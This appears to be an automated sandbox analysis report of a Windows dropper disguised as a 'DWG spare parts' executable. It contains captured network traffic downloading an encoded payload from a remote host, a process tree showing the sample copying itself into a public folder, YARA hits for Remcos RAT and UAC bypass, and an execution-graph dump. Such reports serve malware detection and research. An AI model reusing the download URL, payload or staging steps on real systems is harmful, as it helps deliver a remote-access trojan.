                                                              Sep 16, 2022 17:08:58.261092901 CEST1240INData Raw: dd 38 ab ce 9f b7 af a9 03 78 62 d9 76 7b 22 62 20 6a ce f3 b4 b3 bd f6 d6 d3 cb 31 07 34 5e bb 24 22 a9 d6 b8 1b bd b7 84 3b 62 f6 74 e3 b0 72 74 41 dd 69 6c 0f a9 a7 b1 b5 9a 6e bb 94 d6 6e a9 af 76 b2 96 07 cd b9 6c 62 fd 76 7b 22 66 20 5e ce
                                                              Data Ascii: 8xbv{"b j14^$";btrtAilnnvlbv{"f ^qlp`p+?fbfrjAnZT@tbt1v3h 2j\YduOrjt!d+nZ&QhrHvv.:t#Avv+wx!t)?}+b{qj3


                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                              6192.168.2.749732141.8.192.15180C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exe
                                                              TimestampkBytes transferredDirectionData
                                                              Sep 16, 2022 17:08:58.269932032 CEST1268OUTGET /Uuddcmhnxqhfgvscgvechrthfvxthbvnjytchegfrhvbrtgnthyfgnbvgfcfbhgfyuyuyuyuyuyuytttrrrfgh HTTP/1.1
                                                              User-Agent: 17
                                                              Host: f0719949.xsph.ru
                                                              Sep 16, 2022 17:08:58.338527918 CEST1269INHTTP/1.1 200 OK
                                                              Server: openresty
                                                              Date: Fri, 16 Sep 2022 15:08:58 GMT
                                                              Content-Length: 480659
                                                              Connection: keep-alive
                                                              Last-Modified: Thu, 15 Sep 2022 23:02:48 GMT
                                                              ETag: "75593-5e8bf3e785579"
                                                              Accept-Ranges: bytes
                                                              Data Raw: 10 0a 59 67 fa fc 4b 10 0e fc 4b 67 fc 38 38 02 4f 51 4d 85 fe 4b fc 67 7b 38 38 20 fc 67 fa 7b 32 0e 67 fe 02 4f 51 67 fa fc 4b 10 0e fc 4b 67 fc 38 38 02 4f 51 4d 85 fe 4b fc 67 7b 38 38 20 fc 67 fa 7b 32 0e 67 fe 02 4f 51 67 fa fc 4b 10 0e fc 4b 67 fc 38 38 02 4f 51 4d 85 fe 4b fc 67 7b 38 38 20 fc 67 fa 7b 32 0e 67 fe 02 4f 51 0a 67 fa fc 4b 10 0e fc 4b 67 fc 38 38 02 4f 51 4d 85 fe 4b fc 67 7b 38 38 20 fc 67 fa 7b 32 0e 67 fe 02 4f 51 0a 67 fa fc 4b 10 0e fc 4b 67 fc 38 38 02 4f 51 4d 85 fe 4b fc 67 7b 38 38 20 fc 67 fa 7b 32 0e 67 fe 02 4f 51 67 fa fc 4b 10 0e fc 4b 67 fc 38 38 02 4f 51 4d 85 fe 4b fc 67 7b 38 38 20 fc 67 fa 7b 32 0e 67 fe 02 4f 51 ee cf ea 5a 60 62 66 72 76 74 68 76 c5 c5 a7 bb 5f b1 b5 68 72 bb bd 6e 93 a9 af 76 bb b7 af a9 b9 6c 62 74 c3 78 bb 5a a9 76 76 bb 5a 66 70 af 66 c1 b9 5a c1 b7 70 6e a7 bb bd 6e 68 ab 70 6a 68 c7 a0 bf 62 0a b5 e9 24 10 b9 41 f3 77 98 20 73 69 88 7d 32 7d 86 77 e3 71 96 cf d5 22 1c 79 7f 82 cd cd 98 32 24 1c 96 34 2e 7a 97 ee cb 86 7f 79 e1 c7 4c ab ad bd 22 bd 6e 78 64 70 6a 76 a5 0c a4 32 60 ef f5 7d 5e f3 e7 79 b1 9e b8 20 57 7c 92 32 66 eb e9 28 5d 8a 24 36 00 ac a6 85 10 90 69 79 b3 f7 b6 77 b3 06 84 67 c5 b2 f9 30 31 1a a7 36 74 eb b8 32 fc 31 9a 20 8c e7 e9 73 5b ee ae 1a 93 e7 eb 69 4f 27 eb 73 22 aa ae 1c c5 47 44 34 b1 f3 b6 1e 70 9e e7 1e 3e e7 f3 6b 4d dc a0 7f 92 ac e9 77 02 45 95 81 5a 03 9e 38 63 de a6 34 c3 aa a4 34 df 32 90 77 74 f3 05 73 b1 62 66 72 6a 74 68 76 78 78 a7 bb a7 b1 b5 68 dd 8f bd 6e 3f 66 5a 76 76 a7 60 e5 b9 6c 62 74 c3 78 bb 5a 09 76 6c 74 bb a9 5e af 66 40 72 5a c1 ab 72 6e a7 bb bd 6e 0c 2a c1 6a 76 6a 5a b1 62 d9 b9 6a 74 68 93 78 78 b7 bb a7 b1 a7 68 72 78 bd c1 76 a9 af 76 bb 74 af 66 b9 6c 62 74 c3 78 0b af a9 76 6a bb 5a 66 70 af 66 bb b9 5a 41 b7 70 5e a7 bb ad 6e 78 64 70 5a 76 5a 6a b1 62 66 72 6a 74 78 76 78 78 a7 bb a7 b1 b5 68 72 bb 7a ac 70 a9 1f 76 bb b7 af 96 74 6c 77 89 c3 78 bb 5a a9 76 76 bb 5a 66 70 af 66 c1 b9 5a c1 b7 70 fe 62 bb 49 56 78 64 60 57 70 5a 8f b1 62 66 72 6a 74 68 76 78 78 a7 bb a7 b1 b5 68 72 bb bd 12 63 af af 5e bb b7 af 54 0c 72 62 91 c3 78 bb 5a a9 76 76 bb 5a 66 70 af d9 6a b9 0e bd b7 70 6e a7 bb bd 6e 78 64 70 6a 76 5a 5a b1 62 66 72 6a 74 68 76 78 78 a7 bb 3c 1a db 7f 79 bb bd 6e f4 a3 5c 76 bb a7 af a9 b9 95 a9 74 c3 6c bb 5a a9 76 76 bb 5a 66 70 af 66 c1 b9 5a e1 b7 70 d1 3c 32 86 84 7b 8e 70 6a dc 26 b5 b1 62 d9 b9 6a 74 6b b9 78 78 52 78 a7 b1 b5 68 72 bb bd 6e 76 a9 af 76 bb 3a af a9 3c 97 d9 7e 30 7a bb 5a a9 9f d5 bb 5a 66 d0 a9 66 c1 a7 5a c1 b7 ac 78 a7 bb bd 6e 78 64 70 6a 76 5a 5a b1 62 a3 72 6a b4 93 7d 83 2c a7 bb a7 b1 72 68 72 bb bd 8b bb a9 af 6c bb b7 af fb bf 6c 62 74 c3 78 bb 5a a9 76 76 bb 5a 66 8d af 66 01 4a 92 7c 7d d3 32 a7 bb 50 74 78 64 70 e5 bb 5a 5a ad 62 66 72 9e 6a 68 76 78 78 a7 bb a7 b1 b5 68 72 bb bd 8b 76 a9 52 a5 32 83 1e e5 b9 6c 62 69 3e 78 bb 5a 96 bb 76 bb 2d 66 70 af b6 b7 b9 5a c1 b7 70 6e a7 bb bd 6e 78 64 70 87 76 5a 97 42 6b 90 81 2a 80 68 76 04 50 a7 bb a7 61 60 68 72 3c bd 6e 76 cb 5a 76 bb b7 af a9 b9 6c 62 74 c3 78 bb 5a 4c 76 76 44 5a 66 70 af 66 c1 b9 5a c1 b7 70 6e a7 bb bd 6e 78 64 70 6a 76 5a 5a b1 62 66 72 6a 74 68 76 78 78 a7 bb a7 b1 b5 68 72 bb bd 6e 76 a9 af 76 bb b7 af a9 b9 6c 62 74 c3 78 bb 5a a9 76 76 bb 5a 66 70 af 66 c1 b9 5a c1 b7 70 6e a7 bb bd 6e 78 64 70 6a 76 5a 5a b1 62 66 72 6a 74 68 76 78 78 a7
                                                              Data Ascii: YgKKg88OQMKg{88 g{2gOQgKKg88OQMKg{88 g{2gOQgKKg88OQMKg{88 g{2gOQgKKg88OQMKg{88 g{2gOQgKKg88OQMKg{88 g{2gOQgKKg88OQMKg{88 g{2gOQZ`bfrvthv_hrnvlbtxZvvZfpfZpnnhpjhb$Aw si}2}wq"y2$4.zyL"nxdpjv2`}^y W|2f(]$6iywg016t21 s[iO's"GD4p>kMwEZ8c442wtsbfrjthvxxhn?fZvv`lbtxZvlt^f@rZrnn*jvjZbjthxxhrxvvtflbtxvjZfpfZAp^nxdpZvZjbfrjtxvxxhrzpvtlwxZvvZfpfZpbIVxd`WpZbfrjthvxxhrc^TrbxZvvZfpjpnnxdpjvZZbfrjthvxx<yn\vtlZvvZfpfZp<2{pj&bjtkxxRxhrnvv:<~0zZZffZxnxdpjvZZbrj},rhrllbtxZvvZffJ|}2PtxdpZZbfrjhvxxhrvR2lbi>xZv-fpZpnnxdpvZBk*hvPa`hr<nvZvlbtxZLvvDZfpfZpnnxdpjvZZbfrjthvxxhrnvvlbtxZvvZfpfZpnnxdpjvZZbfrjthvxx
                                                              Sep 16, 2022 17:08:58.338555098 CEST1271INData Raw: bb a7 b1 b5 68 72 bb bd 6e 76 a9 af 76 bb b7 af a9 b9 6c 62 74 c3 78 bb 5a a9 76 76 bb 5a 66 70 af 66 c1 b9 5a c1 b7 70 6e a7 bb bd 6e 78 64 70 6a 76 5a 5a b1 62 66 72 6a 74 68 76 78 78 a7 bb a7 b1 b5 68 72 bb bd 6e 76 a9 af 76 bb b7 af a9 b9 6c
                                                              Data Ascii: hrnvvlbtxZvvZfpfZpnnxdpjvZZbfrjthvxxhrnvvlbtxZvvZfpfZpnnxdpjvZZbfrjthvxxNr#~v(ftvz@v#GvpqVbfDv=bfnLvrq#WJxm:d^fk%,dp}V
                                                              Sep 16, 2022 17:08:58.338571072 CEST1272INData Raw: c3 a9 b9 7b bf 90 87 78 23 8c b9 b7 76 c9 f3 f1 95 1f 9d c1 21 06 98 76 70 79 80 df 91 6e d0 4a 60 c3 76 90 f3 26 30 7a 3e 6a cc 52 66 b9 78 dd b2 20 95 c9 4c 72 23 9b 5e b7 a9 e5 f7 2c a1 cb a5 b9 d4 30 64 6a 78 c9 f3 9e b6 09 48 5a be 79 86 a7
                                                              Data Ascii: {x#v!vpynJ`v&0z>jRfx Lr#^,0djxHZy.JpltnCk^{6Z,t vbN8v{"n\}gJ^fn9oEsn_Cd/siZSb/B&{l1LBZ|v3pz?&tp4;Vuh,
                                                              Sep 16, 2022 17:08:58.338588953 CEST1273INData Raw: 27 3c 56 a1 87 b9 a7 77 5a 29 eb 0f c3 4e 6e 78 7e 29 e7 ce 4b 89 b1 62 27 c6 62 2f 99 67 6d 31 fb 94 0f f3 ab 68 72 2a cf 27 f3 11 94 a3 bb b7 00 ed 3e 42 62 91 0a b4 3c 54 a9 37 be c1 73 60 27 84 a2 46 8f 5a e2 ee 71 5e 0f 38 76 6e 78 94 cd 7e
                                                              Data Ascii: '<VwZ)Nnx~)Kb'b/gm1hr*'>Bb<T7s`'FZq^8vnx~/nf;|QNh3KUtH\I4Zl;NwXvZKdWxzwjvZkdhvxrP,3?d^^Hu5l^W1"'.A@(td94frj5<<V0~*?RH\}b/
                                                              Sep 16, 2022 17:08:58.338606119 CEST1275INData Raw: b9 64 70 2b c6 3b fb f2 4e 62 dd d2 0a a9 76 78 c5 44 da aa 64 48 c0 c0 ab bd 6e d3 d0 72 8a 23 d7 70 a9 b9 7e cd 35 a6 d0 f9 b3 a9 76 2f b6 8a 92 29 bc 98 fb c5 5a 8c de 0f d6 3d c1 bd 6e 81 64 79 6a 2f ac c2 a6 60 66 72 2b aa e5 f7 81 78 5a 38
                                                              Data Ascii: dp+;NbvxDdHnr#p~5v/)Z=ndyj/`fr+xZ86nj l}b0ipvZpz?q Z8$vrvjv;Zr{tqfA'/lf"}blv/lrfrn%hdp,1FlA3Br\R-Vjvzv
                                                              Sep 16, 2022 17:08:58.338623047 CEST1276INData Raw: ee c3 5a 6e ee 19 cd 41 ef 23 6e 74 76 a9 80 2f ed 1f 1c 5a 6c b9 43 ac 1b a0 c1 5a a9 b7 40 ab 3b 2f 71 bf c9 19 0a 68 c1 b7 29 8f 36 a7 cd cb aa 60 70 df 2f 25 c2 2f b1 b3 bf e5 35 a0 ce b0 6a a7 bb 88 f8 03 c0 44 70 70 bb 2f f1 07 57 c1 b7 af
                                                              Data Ascii: ZnA#ntv/ZlCZ@;/qh)6`p/%/5jDpp/Wuv4Z/"bflq )x}nnjthl%3m'-rw`nnDJpnP,n\QZyb1#h#\\`jx;^p?Zp|Z
                                                              Sep 16, 2022 17:08:58.338639975 CEST1277INData Raw: ce 85 0f 62 5c e0 6c 48 8d 1a 6c a3 a3 38 6e b3 48 a3 77 78 ed 5e c1 e5 84 8c df 29 6d 36 af dc 11 90 bc 0e 6c c3 a7 3b ff ba 2f ba b7 c1 41 d5 69 60 ee 26 ee 9a 8f ed 48 b2 85 bf 8e d0 30 3d ca 34 7b f0 e7 d4 3a bc 76 c5 72 ef 8b 0f 2f a0 40 03
                                                              Data Ascii: b\lHl8nHwx^)m6l;/Ai`&H0=4{:vr/@rZZEd?pxn$0A#Hp\b}"!Zv1jv~)tko%'d)Pg)@={**5}fj8-v.!xn?l)vxEd!th
                                                              Sep 16, 2022 17:08:58.338654995 CEST1279INData Raw: 3f 13 a7 b3 df f6 05 19 f0 25 74 6a 80 cb ee b8 cb 7a f9 c9 bd 81 67 62 3b ce 43 b4 ca e8 c4 b5 c3 31 b0 0f 26 1f 64 68 c7 33 ed 25 73 09 5c 62 2f 05 7a 9e d5 94 94 43 76 e2 1f 23 08 d6 c3 c3 da f7 be a5 cc b3 74 e0 2b 20 a7 29 be 0f 97 c6 bb c5
                                                              Data Ascii: ?%tjzgb;C1&dh3%s\b/zCv#t+ )+fr5lZ,x3%\j~z51lnn;tltnEhZmk^5Uj/3n?k.j;Zn}y)(d?+Z%)pD!
                                                              Sep 16, 2022 17:08:58.338671923 CEST1280INData Raw: 6e dc 37 69 6c c1 eb 35 66 9f f8 b4 c9 ca 25 0f b5 c3 31 41 36 d7 66 b2 f6 5c 87 94 25 7b 19 5c 62 37 ff ab f6 58 28 64 43 74 a1 f9 72 f1 ee 87 67 b3 31 25 36 ab 2d d8 32 e1 38 b7 df 27 f9 23 79 0f c5 b1 f4 aa 7d cf 50 c2 1e 95 bf 81 6d 88 2f a6
                                                              Data Ascii: n7il5f%1A6f\%{\b7X(dCtrg1%6-28'#y}Pm/KZd1kt5J/5i5jFht'#2);g~99dyZ#?\/\b5#\~y?!j'"'A}d#dysA?i`#h32nN8-r5P-Zfp
                                                              Sep 16, 2022 17:08:58.338687897 CEST1281INData Raw: d9 80 8a 31 bf 0f 60 ca 64 68 41 79 22 28 27 3f 38 2e db 23 6a 21 5c 6c b9 69 6d e3 31 9e 86 11 a5 c6 6e a7 b3 83 2e 8f e8 f0 83 1c 92 27 8f 36 26 25 8a c8 b1 bd 2b f3 3b c2 09 41 be bf b7 35 03 0b e7 31 a7 da f7 f6 4c 79 a3 da 44 6f 96 8b ff 44
                                                              Data Ascii: 1`dhAy"('?8.#j!\lim1n.'6&%+;A51LyDoDZ)^vlb5iJ;TDzv)"<Es=+0{t}i\DogJo-3m#fi)tj+r=xd:igq3?1"6`CnFnj'^\/Ar!j'
                                                              Sep 16, 2022 17:08:58.403788090 CEST1283INData Raw: dd 38 ab ce 9f b7 af a9 03 78 62 d9 76 7b 22 62 20 6a ce f3 b4 b3 bd f6 d6 d3 cb 31 07 34 5e bb 24 22 a9 d6 b8 1b bd b7 84 3b 62 f6 74 e3 b0 72 74 41 dd 69 6c 0f a9 a7 b1 b5 9a 6e bb 94 d6 6e a9 af 76 b2 96 07 cd b9 6c 62 fd 76 7b 22 66 20 5e ce
                                                              Data Ascii: 8xbv{"b j14^$";btrtAilnnvlbv{"f ^qlp`p+?fbfrjAnZT@tbt1v3h 2j\YduOrjt!d+nZ&QhrHvv.:t#Avv+wx!t)?}+b{qj3


                                                              Statistics

                                                              CPU Usage

                                                              Click to jump to process

                                                              Memory Usage

                                                              Click to jump to process

                                                              High Level Behavior Distribution

                                                              Click to dive into process behavior distribution

                                                              Behavior

                                                              Click to jump to process

                                                              System Behavior

                                                              General

                                                              Target ID:0
                                                              Start time:17:08:27
                                                              Start date:16/09/2022
                                                              Path:C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exe"
                                                              Imagebase:0x400000
                                                              File size:932352 bytes
                                                              MD5 hash:E9D007AC53470351186A5B53BC180ED3
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:Borland Delphi
                                                              Yara matches:
                                                              • Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source: 00000000.00000003.247877361.000000007FCA0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source: 00000000.00000002.258580914.000000000252D000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source: 00000000.00000002.258351591.000000000231E000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000003.257505100.000000007EF10000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000003.257505100.000000007EF10000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.259012646.000000007EF90000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000002.259012646.000000007EF90000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                              Reputation:low

                                                              General

                                                              Target ID:1
                                                              Start time:17:08:32
                                                              Start date:16/09/2022
                                                              Path:C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exe
                                                              Imagebase:0x400000
                                                              File size:932352 bytes
                                                              MD5 hash:E9D007AC53470351186A5B53BC180ED3
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000001.00000000.257426090.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer, Description: detects Windows exceutables potentially bypassing UAC using eventvwr.exe, Source: 00000001.00000000.257426090.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000001.00000000.257426090.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000001.00000000.257426090.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                              Reputation:low

                                                              General

                                                              Target ID:2
                                                              Start time:17:08:43
                                                              Start date:16/09/2022
                                                              Path:C:\Users\Public\Libraries\Uuddcmhn.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Users\Public\Libraries\Uuddcmhn.exe"
                                                              Imagebase:0x400000
                                                              File size:932352 bytes
                                                              MD5 hash:E9D007AC53470351186A5B53BC180ED3
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:Borland Delphi
                                                              Yara matches:
                                                              • Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source: 00000002.00000002.298955656.000000000276D000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                              Reputation:low

                                                              General

                                                              Target ID:6
                                                              Start time:17:08:50
                                                              Start date:16/09/2022
                                                              Path:C:\Users\Public\Libraries\Uuddcmhn.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:C:\Users\Public\Libraries\Uuddcmhn.exe
                                                              Imagebase:0x400000
                                                              File size:932352 bytes
                                                              MD5 hash:E9D007AC53470351186A5B53BC180ED3
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Reputation:low

                                                              General

                                                              Target ID:12
                                                              Start time:17:08:55
                                                              Start date:16/09/2022
                                                              Path:C:\Users\Public\Libraries\Uuddcmhn.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Users\Public\Libraries\Uuddcmhn.exe"
                                                              Imagebase:0x400000
                                                              File size:932352 bytes
                                                              MD5 hash:E9D007AC53470351186A5B53BC180ED3
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:Borland Delphi
                                                              Yara matches:
                                                              • Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source: 0000000C.00000002.315016361.000000000289D000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                              Reputation:low

                                                              General

                                                              Target ID:14
                                                              Start time:17:08:58
                                                              Start date:16/09/2022
                                                              Path:C:\Users\Public\Libraries\Uuddcmhn.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:C:\Users\Public\Libraries\Uuddcmhn.exe
                                                              Imagebase:0x400000
                                                              File size:932352 bytes
                                                              MD5 hash:E9D007AC53470351186A5B53BC180ED3
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Reputation:low

                                                              Disassembly

                                                              Reset < >

                                                                Execution Graph

                                                                Execution Coverage:12.4%
                                                                Dynamic/Decrypted Code Coverage:100%
                                                                Signature Coverage:55.1%
                                                                Total number of Nodes:1726
                                                                Total number of Limit Nodes:19
                                                                execution_graph 16831 2527bc0 17278 2514c24 16831->17278 17279 2514c35 17278->17279 17280 2514c72 17279->17280 17281 2514c5b 17279->17281 17296 2514964 17280->17296 17287 2514f90 17281->17287 17284 2514ca3 17285 2514c68 17285->17284 17301 25148f4 17285->17301 17289 2514f9d 17287->17289 17294 2514fcd 17287->17294 17290 2514fc6 17289->17290 17293 2514fa9 17289->17293 17291 2514964 11 API calls 17290->17291 17291->17294 17292 2514fb7 17292->17285 17307 2512c74 17293->17307 17314 25148a0 17294->17314 17297 2514968 17296->17297 17298 251498c 17296->17298 17359 2512c40 17297->17359 17298->17285 17300 2514975 17300->17285 17303 2514908 17301->17303 17304 25148f8 17301->17304 17302 2514936 17302->17284 17303->17302 17306 2512c5c 11 API calls 17303->17306 17304->17303 17305 2514964 11 API calls 17304->17305 17305->17303 17306->17302 17308 2512c7a 17307->17308 17308->17292 17309 2512cf5 17308->17309 17310 2512c8c 17308->17310 17318 251676c 17308->17318 17326 2512cc4 17309->17326 17310->17292 17315 25148c1 17314->17315 17316 25148a6 17314->17316 17315->17292 17316->17315 17352 2512c5c 17316->17352 17319 25167a1 TlsGetValue 17318->17319 17320 251677b 17318->17320 17321 2516786 17319->17321 17322 25167ab 17319->17322 17320->17309 17329 25166a0 17321->17329 17322->17309 17324 251678b TlsGetValue 17325 251679a 17324->17325 17325->17309 17336 2514888 17326->17336 17330 25166a6 17329->17330 17331 25166ca 17330->17331 17335 251668c LocalAlloc 17330->17335 17331->17324 17333 25166c6 17333->17331 17334 25166d6 TlsSetValue 17333->17334 17334->17331 17335->17333 17339 25147ac 17336->17339 17340 25147c0 17339->17340 17342 25147e7 17340->17342 17346 2514720 17340->17346 17343 2514833 FreeLibrary 17342->17343 17344 2514857 ExitProcess 17342->17344 17343->17342 17347 2514781 17346->17347 17348 251472a GetStdHandle WriteFile GetStdHandle WriteFile 17346->17348 17350 251478a MessageBoxA 17347->17350 17351 251479d 17347->17351 17348->17342 17350->17351 17351->17342 17353 2512c6a 17352->17353 17354 2512c60 17352->17354 17353->17315 17354->17353 17355 2512cf5 17354->17355 17356 251676c 4 API calls 17354->17356 17357 2512cc4 7 API calls 17355->17357 17356->17355 17358 2512d16 17357->17358 17358->17315 17360 2512c57 17359->17360 17362 2512c44 17359->17362 17360->17300 17361 2512c4e 17361->17300 17362->17361 17363 2512cf5 17362->17363 17364 251676c 4 API calls 17362->17364 17365 2512cc4 7 API calls 17363->17365 17364->17363 17366 2512d16 17365->17366 17366->17300 17367 252b0c0 17370 2525de4 17367->17370 17369 252b0c8 17371 2525dec 17370->17371 17371->17371 17372 2525e0d 17371->17372 17373 252a7b8 17372->17373 18267 2513024 QueryPerformanceCounter 17372->18267 17375 2525e19 17376 2525e26 17375->17376 18270 25236cc 17376->18270 17378 2525e40 17379 2525e4d 17378->17379 17380 25236cc 20 API calls 17379->17380 17381 2525e67 17380->17381 17382 2525e74 17381->17382 17383 25236cc 20 API calls 17382->17383 17384 2525e8e 17383->17384 17385 2525e9b 17384->17385 17386 25236cc 20 API calls 17385->17386 17387 2525eb5 17386->17387 17388 2525ec2 17387->17388 17389 25236cc 20 API calls 17388->17389 17390 2525ee2 17389->17390 17391 2525ef2 17390->17391 17392 25236cc 20 API calls 17391->17392 17393 2525f15 17392->17393 17394 2525f25 17393->17394 17395 25236cc 20 API calls 17394->17395 17396 2525f48 17395->17396 17397 2525f58 17396->17397 17398 25236cc 20 API calls 17397->17398 17399 2525f7b 17398->17399 17400 2525f8b 17399->17400 17401 25236cc 20 API calls 17400->17401 17402 2525fae 17401->17402 17403 2525fbe 17402->17403 17404 25236cc 20 API calls 17403->17404 17405 2525fe1 17404->17405 17406 2525ff1 17405->17406 17407 25236cc 20 API calls 17406->17407 17408 2526014 17407->17408 17409 2526024 17408->17409 17410 25236cc 20 API calls 17409->17410 17411 2526047 17410->17411 17412 2526057 17411->17412 17413 25236cc 20 API calls 17412->17413 17414 252607a 17413->17414 17415 252608a 17414->17415 17416 25236cc 20 API calls 17415->17416 17417 25260ad 17416->17417 17418 25260bd 17417->17418 17419 25236cc 20 API calls 17418->17419 17420 25260e0 17419->17420 17421 25260f0 17420->17421 17422 25236cc 20 API calls 17421->17422 17423 2526113 17422->17423 17424 2526123 17423->17424 17425 25236cc 20 API calls 17424->17425 17426 2526146 17425->17426 17427 2526156 17426->17427 17428 25236cc 20 API calls 17427->17428 17429 2526179 17428->17429 17430 2526189 17429->17430 17431 25236cc 20 API calls 17430->17431 17432 25261ac 17431->17432 17433 25261bc 17432->17433 17434 25236cc 20 API calls 17433->17434 17435 25261df 17434->17435 17436 25261ef 17435->17436 17437 25236cc 20 API calls 17436->17437 17438 2526212 17437->17438 17439 2526222 17438->17439 17440 25236cc 20 API calls 17439->17440 17441 2526245 17440->17441 17442 2526255 17441->17442 17443 25236cc 20 API calls 17442->17443 17444 2526278 17443->17444 17445 2526288 17444->17445 17446 25236cc 20 API calls 17445->17446 17447 25262ab 17446->17447 17448 25262bb 17447->17448 17449 25236cc 20 API calls 17448->17449 17450 25262de 17449->17450 17451 25262ee 17450->17451 17452 25236cc 20 API calls 17451->17452 17453 2526311 17452->17453 17454 2526321 17453->17454 17455 25236cc 20 API calls 17454->17455 17456 2526344 17455->17456 17457 2526354 17456->17457 17458 252636b 17457->17458 17459 25236cc 20 API calls 17458->17459 17460 2526377 17459->17460 17461 252639e 17460->17461 17462 25236cc 20 API calls 17461->17462 17463 25263aa 17462->17463 17464 25263d1 17463->17464 17465 25236cc 20 API calls 17464->17465 17466 25263dd 17465->17466 17467 25236cc 20 API calls 17466->17467 17468 2526410 17467->17468 17469 25236cc 20 API calls 17468->17469 17470 2526443 17469->17470 17471 25236cc 20 API calls 17470->17471 17472 2526476 17471->17472 17473 25236cc 20 API calls 17472->17473 17474 25264a9 17473->17474 17475 25236cc 20 API calls 17474->17475 17476 25264dc 17475->17476 17477 25236cc 20 API calls 17476->17477 17478 252650f 17477->17478 17479 25236cc 20 API calls 17478->17479 17480 2526542 17479->17480 17481 25236cc 20 API calls 17480->17481 17482 2526575 17481->17482 17483 25236cc 20 API calls 17482->17483 17484 25265a8 17483->17484 17485 25236cc 20 API calls 17484->17485 17486 25265db 17485->17486 17487 25236cc 20 API calls 17486->17487 17488 252660e 17487->17488 17489 25236cc 20 API calls 17488->17489 17490 2526641 17489->17490 17491 25236cc 20 API calls 17490->17491 17492 2526674 17491->17492 17493 25236cc 20 API calls 17492->17493 17494 25266a7 17493->17494 17495 25236cc 20 API calls 17494->17495 17496 25266da 17495->17496 17497 25236cc 20 API calls 17496->17497 17498 252670d 17497->17498 17499 25236cc 20 API calls 17498->17499 17500 2526740 17499->17500 17501 25236cc 20 API calls 17500->17501 17502 2526773 17501->17502 17503 25236cc 20 API calls 17502->17503 17504 25267a6 17503->17504 17505 25267b4 17504->17505 17506 25267c5 17504->17506 17507 25148f4 11 API calls 17505->17507 17508 25148f4 11 API calls 17506->17508 17509 25267c3 17507->17509 17508->17509 17510 2514c24 11 API calls 17509->17510 17511 25267f4 17510->17511 18283 2514bb0 17511->18283 17513 2526829 17514 25236cc 20 API calls 17513->17514 17515 252684d 17514->17515 17516 2514c24 11 API calls 17515->17516 17517 252686d 17516->17517 17518 2514bb0 11 API calls 17517->17518 17519 25268a2 17518->17519 17520 25236cc 20 API calls 17519->17520 17521 25268c6 17520->17521 17522 2514c24 11 API calls 17521->17522 17523 25268e6 17522->17523 17524 2514bb0 11 API calls 17523->17524 17525 252691b 17524->17525 17526 25236cc 20 API calls 17525->17526 17527 252693f 17526->17527 17528 2514c24 11 API calls 17527->17528 17529 252695f 17528->17529 17530 2514bb0 11 API calls 17529->17530 17531 2526994 17530->17531 17532 25236cc 20 API calls 17531->17532 17533 25269b8 17532->17533 18298 2512fc4 17533->18298 17538 25148f4 11 API calls 17539 25269ee 17538->17539 18311 2514dc4 17539->18311 17542 2514c24 11 API calls 17543 2526a41 17542->17543 17544 2514bb0 11 API calls 17543->17544 17545 2526a76 17544->17545 17546 25236cc 20 API calls 17545->17546 17547 2526a9a 17546->17547 18318 2518110 17547->18318 17550 2526bb9 17553 2514c24 11 API calls 17550->17553 17551 2526aac 17552 2514c24 11 API calls 17551->17552 17554 2526acc 17552->17554 17555 2526bd9 17553->17555 17556 2514bb0 11 API calls 17554->17556 17557 2514bb0 11 API calls 17555->17557 17559 2526b01 17556->17559 17558 2526c0e 17557->17558 17560 25236cc 20 API calls 17558->17560 17561 25236cc 20 API calls 17559->17561 